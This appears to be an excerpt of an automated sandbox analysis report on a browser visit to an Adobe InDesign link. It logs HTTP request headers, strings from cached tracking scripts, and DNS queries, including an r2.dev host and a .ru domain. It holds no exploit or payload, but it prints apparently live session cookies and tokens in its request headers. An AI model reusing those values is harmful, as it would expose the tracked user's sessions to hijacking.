cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0
Source: global traffic HTTP traffic detected: GET /p/insights/t/5067725 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F
Source: global traffic HTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: evantaagartnercompany.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=63748165052475827072314916508265657231
Source: global traffic HTTP traffic detected: GET /signals/config/585643694936481?v=2.9.166&r=stable&domain=reviews.capterra.com&hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /id?d_visid_ver=5.1.1&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=04D07E1C5E4DDABB0A495ED1%40AdobeOrg&d_nsid=0&ts=1725034633424 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=63748165052475827072314916508265657231
Source: global traffic HTTP traffic detected: GET /datalayer/v4/latest.js HTTP/1.1Host: edge.fullstory.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /visitor/v200/svrGP.aspx?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&elq1pcGUID=E0C2E43BC92D468AACBFD54EF3B6885A HTTP/1.1Host: tracking.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034632.35.0.0; _uetsid=5154566066eb11ef9610b7a0af03a19e; _uetvid=5154816066eb11efb250d7a43de017cc; AMCVS_04D07E1C5E4DDABB0A495ED1%40AdobeOrg=1; AMCV_04D07E1C5E4DDABB0A495ED1%40AdobeOrg=-637568504%7CMCIDTS%7C19966%7CMCMID%7C59145117128128990483045357532560318612%7CMCAAMLH-1725639434%7C6%7CMCAAMB-1725639434%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1725041834s%7CNONE%7CvVersion%7C5.1.1
Source: global traffic HTTP traffic detected: GET /cid/7dafa3f5f9e8efd6782940aa05719f12?assign=false&callback=u_294798340052452740 HTTP/1.1Host: c.lytics.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/personalize/7dafa3f5f9e8efd6782940aa05719f12/user/_uid/d0b770c2-2504-4a3b-9011-7567d0a062b1/iframe?segments=true&fields=dv360_id_ts&mergestate=true&ts=1725034635314 HTTP/1.1Host: c.lytics.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /p/insights/t/5067725 HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F; MR=0
Source: global traffic HTTP traffic detected: GET /datalayer/v4/latest.js HTTP/1.1Host: edge.fullstory.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/landing?gcs=G111&gcd=13t3t3t3t5l1&tag_exp=101529666&rnd=1599516134.1725034627&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&dma=0&npa=0&gtm=45He48s0n81P4GLD4Nv76106154za200&auid=1810143887.1725034608 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /p/insights/s/0.7.45 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUID=0752D3E2ED77641A3B63C709EC70657F; MSPTC=n6tZBkA75OV6oqul_bzIpbncnO-GUEYstgU_Zy6nqg8; MR=0; MSPTC=pmKV2y-fAwi1fcU6ImmJ3igyaos-m5ZWMPvhw7xG0JM
Source: global traffic HTTP traffic detected: GET /pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://publicate.itSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: Mt1yFdjQPWjwFhbPAr5YHw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /tr/?id=585643694936481&ev=PageView&dl=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&rl=https%3A%2F%2Fwww.capterra.com%2F&if=false&ts=1725034636169&sw=1280&sh=1024&v=2.9.166&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1725034636167.922766995701261619&ler=other&cdl=API_unavailable&it=1725034633476&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_622.2.dr, chromecache_784.2.dr String found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Vj:function(){e=Bb()},nd:function(){d()}}};var hc=ka(["data-gtm-yt-inspected-"]),wC=["www.youtube.com","www.youtube-nocookie.com"],xC,yC=!1; equals www.youtube.com (Youtube)
Source: chromecache_622.2.dr String found in binary or memory: N.getElementsByTagName("iframe"),ma=R.length,la=0;la<ma;la++)if(!u&&c(R[la],H.Ee)){XI("https://www.youtube.com/iframe_api");u=!0;break}})}}else G(v.vtp_gtmOnSuccess)}var q=["www.youtube.com","www.youtube-nocookie.com"],r={UNSTARTED:-1,ENDED:0,PLAYING:1,PAUSED:2,BUFFERING:3,CUED:5},t,u=!1;Z.__ytl=n;Z.__ytl.C="ytl";Z.__ytl.isVendorTemplate=!0;Z.__ytl.priorityOverride=0;Z.__ytl.isInfrastructure=!1; equals www.youtube.com (Youtube)
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: __d("LiveChatPluginConstants",["$InternalEnum"],(function(a,b,c,d,e,f){"use strict";a="LiveChatEvent/";c="mqtt";d=b("$InternalEnum")({CONNECTED:"Connected",CONNECTING:"Connecting",DISCONNECTED:"Disconnected"});e=250;b=a+"close_timestamps";var g=a+"reset_badging",h=a+"state",i=a+"switch_account",j=a+"typing",k=a+"unread_count",l=a+"update_message_list",m="platform/plugins/connect/guest",n=a+"guest_upgrade_success",o=a+"guest_upgrade_success_incognito",p=a+"navigate_to_welcome_page",q="platform/plugins/connect/access_token";a=a+"start_re_engagement";var r=124,s=187,t=24,u=424,v=288,w=313,x=219,y=40,z=36,A=24,B=18,C=708,D=540,E=244,F=202,G=509,H=430,I=6,J=0,K=1,L=-1,M="messaging_plugin",N=8634e4,O="#8A8D91",P="entrypoint:customer_chat_plugin",Q=0,R=1,S=2,T=3,U="new_message_update",V="initial_fetch",W=5e3,X="https://www.facebook.com/business/help/1661027437357021";f.MQTT=c;f.MQTTGatewayConnectionState=d;f.LOGIN_CHECK_INTERVAL=e;f.CLOSE_TIMESTAMPS=b;f.RESET_BADGING=g;f.STATE_UPDATE=h;f.SWITCH_ACCOUNT=i;f.TYPING_UPDATE=j;f.UNREAD_COUNT_UPDATE=k;f.UPDATE_MESSAGE_LIST=l;f.GUEST_MODE_CONNECT=m;f.GUEST_UPGRADE_SUCCESS=n;f.GUEST_UPGRADE_SUCCESS_INCOGNITO=o;f.NAVIGATE_TO_WELCOME_PAGE=p;f.ACCESS_TOKEN_LOGIN=q;f.START_RE_ENGAGEMENT=a;f.PROMPT_FALLBACK_HEIGHT=r;f.PROMPT_REDESIGN_FALLBACK_HEIGHT=s;f.PROMPT_CONTAINER_PADDING_HEIGHT=t;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT=u;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT=v;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=w;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=x;f.WELCOME_PAGE_ATTRIBUTION_OFFEST_HEIGHT=y;f.WELCOME_PAGE_ATTRIBUTION_OFFSET_HEIGHT_WITH_COMPACT=z;f.MAIN_IFRAME_PADDING_HEIGHT=A;f.MAIN_IFRAME_PADDING_HEIGHT_WITH_COMPACT=B;f.THREAD_PAGE_HEIGHT=C;f.THREAD_PAGE_HEIGHT_COMPACT=D;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT=E;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT_COMPACT=F;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT=G;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT_COMPACT=H;f.GREETING_TEXT_BOTTOM_SPACING_OFFEST=I;f.LOGGED_IN_CHAT_MODE=J;f.GUEST_CHAT_MODE=K;f.INVALID_CHAT_MODE=L;f.MESSENGING_PLUGIN=M;f.GUEST_SESSION_STORAGE_VALIDITY_MS=N;f.GUEST_SEND_BUTTON_COLOR_EMPTY_INPUT=O;f.LIVE_CHAT_ENTRYPOINT_ATTRIBUTION_TAG=P;f.ITP_CONSISTENCY_UNKNOWN_LOGGED_OUT=Q;f.ITP_CONSISTENCY_CONSISTENT_LOGGED_IN=R;f.ITP_CONSISTENCY_INCONSISTENT=S;f.ITP_CONSISTENCY_CONSISTENT_NO_ITP=T;f.NEW_MESSAGE_UPDATE=U;f.INITIAL_FETCH=V;f.PLUGIN_FADE_DELAY=W;f.HELP_DEX_LINK=X}),66); equals www.facebook.com (Facebook)
Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.dr String found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Yg:e,Wg:f,Xg:g,Ih:k,Jh:m,Ee:n,Cb:b},q=D.YT;if(q)return q.ready&&q.ready(d),b;var r=D.onYouTubeIframeAPIReady;D.onYouTubeIframeAPIReady=function(){r&&r();d()};G(function(){for(var t=E.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(HC(w,"iframe_api")||HC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!yC&&FC(x[A],p.Ee))return xc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_352.2.dr, chromecache_807.2.dr, chromecache_566.2.dr, chromecache_525.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: return b}uC.J="internal.enableAutoEventOnTimer";var hc=ka(["data-gtm-yt-inspected-"]),wC=["www.youtube.com","www.youtube-nocookie.com"],xC,yC=!1; equals www.youtube.com (Youtube)
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: window.FB&&window.FB.__buffer&&(window.__buffer=babelHelpers["extends"]({},window.FB.__buffer)); } }).call(global);})();} catch (__fb_err) {var __fb_i = new Image();__fb_i.crossOrigin = 'anonymous';__fb_i.dataset.testid = 'fbSDKErrorReport';__fb_i.src='https://www.facebook.com/platform/scribe_endpoint.php/?c=jssdk_error&m='+encodeURIComponent('{"error":"LOAD", "extra": {"name":"'+__fb_err.name+'","line":"'+(__fb_err.lineNumber||__fb_err.line)+'","script":"'+(__fb_err.fileName||__fb_err.sourceURL||__fb_err.script||"sdk.js")+'","stack":"'+(__fb_err.stackTrace||__fb_err.stack)+'","revision":"1016108272","namespace":"FB","message":"'+__fb_err.message+'"}}');document.body.appendChild(__fb_i);} equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: prod.adobeccstatic.com
Source: global traffic DNS traffic detected: DNS query: use.typekit.net
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: p.typekit.net
Source: global traffic DNS traffic detected: DNS query: connect.facebook.net
Source: global traffic DNS traffic detected: DNS query: js-agent.newrelic.com
Source: global traffic DNS traffic detected: DNS query: bam-cell.nr-data.net
Source: global traffic DNS traffic detected: DNS query: pblc.me
Source: global traffic DNS traffic detected: DNS query: img.pblc.it
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: pub-e1c6f3d85d51402790227684363ac52c.r2.dev
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: quantumspirel.ru
Source: global traffic DNS traffic detected: DNS query: publicate.it
Source: global traffic DNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
Source: global traffic DNS traffic detected: DNS query: platform-api.sharethis.com
Source: global traffic DNS traffic detected: DNS query: js.hs-scripts.com
Source: global traffic DNS traffic detected: DNS query: sc.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: static.woopra.com
Source: global traffic DNS traffic detected: DNS query: www.woopra.com
Source: global traffic DNS traffic detected: DNS query: tr-rc.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: snap.licdn.com
Source: global traffic DNS traffic detected: DNS query: static.hotjar.com
Source: global traffic DNS traffic detected: DNS query: assets.getalvis.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: analytics.google.com
Source: global traffic DNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: www.clarity.ms
Source: global traffic DNS traffic detected: DNS query: public.profitwell.com
Source: global traffic DNS traffic detected: DNS query: td.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic DNS traffic detected: DNS query: script.hotjar.com
Source: global traffic DNS traffic detected: DNS query: www.linkedin.com
Source: global traffic DNS traffic detected: DNS query: t.clarity.ms
Source: global traffic DNS traffic detected: DNS query: widget.intercom.io
Source: global traffic DNS traffic detected: DNS query: c.clarity.ms
Source: global traffic DNS traffic detected: DNS query: js.intercomcdn.com
Source: global traffic DNS traffic detected: DNS query: api-iam.intercom.io
Source: global traffic DNS traffic detected: DNS query: nexus-websocket-a.intercom.io
Source: global traffic DNS traffic detected: DNS query: www.capterra.com
Source: global traffic DNS traffic detected: DNS query: js.driftt.com
Source: global traffic DNS traffic detected: DNS query: i.vimeocdn.com
Source: global traffic DNS traffic detected: DNS query: seoab.io
Source: global traffic DNS traffic detected: DNS query: lead-acquisition-service.softwareadvice.com
Source: global traffic DNS traffic detected: DNS query: gdm-catalog-fmapi-prod.imgix.net
Source: global traffic DNS traffic detected: DNS query: www.datadoghq-browser-agent.com
Source: global traffic DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic DNS traffic detected: DNS query: unpkg.com
Source: global traffic DNS traffic detected: DNS query: forms-as-a-service.capterra.com
Source: global traffic DNS traffic detected: DNS query: customer.api.drift.com
Source: global traffic DNS traffic detected: DNS query: conversation.api.drift.com
Source: global traffic DNS traffic detected: DNS query: metrics.api.drift.com
Source: global traffic DNS traffic detected: DNS query: targeting.api.drift.com
Source: global traffic DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: 8036043.fls.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: ad.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: geolocation.onetrust.com
Source: global traffic DNS traffic detected: DNS query: adservice.google.com
Source: global traffic DNS traffic detected: DNS query: reviews.capterra.com
Source: global traffic DNS traffic detected: DNS query: browser-intake-datadoghq.com
Source: global traffic DNS traffic detected: DNS query: www.ipqualityscore.com
Source: global traffic DNS traffic detected: DNS query: device.maxmind.com
Source: global traffic DNS traffic detected: DNS query: d-ipv6.mmapiws.com
Source: global traffic DNS traffic detected: DNS query: reveal.clearbit.com
Source: global traffic DNS traffic detected: DNS query: a.quora.com
Source: global traffic DNS traffic detected: DNS query: img.en25.com
Source: global traffic DNS traffic detected: DNS query: cdn0.capterra-static.com
Source: global traffic DNS traffic detected: DNS query: c.lytics.io
Source: global traffic DNS traffic detected: DNS query: q.quora.com
Source: global traffic DNS traffic detected: DNS query: tracking.capterra.com
Source: global traffic DNS traffic detected: DNS query: dpm.demdex.net
Source: global traffic DNS traffic detected: DNS query: evantaagartnercompany.demdex.net
Source: global traffic DNS traffic detected: DNS query: edge.fullstory.com
Source: global traffic DNS traffic detected: DNS query: cm.everesttech.net
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: unknown HTTP traffic detected: POST /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=16315&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveContent-Length: 516sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://indd.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
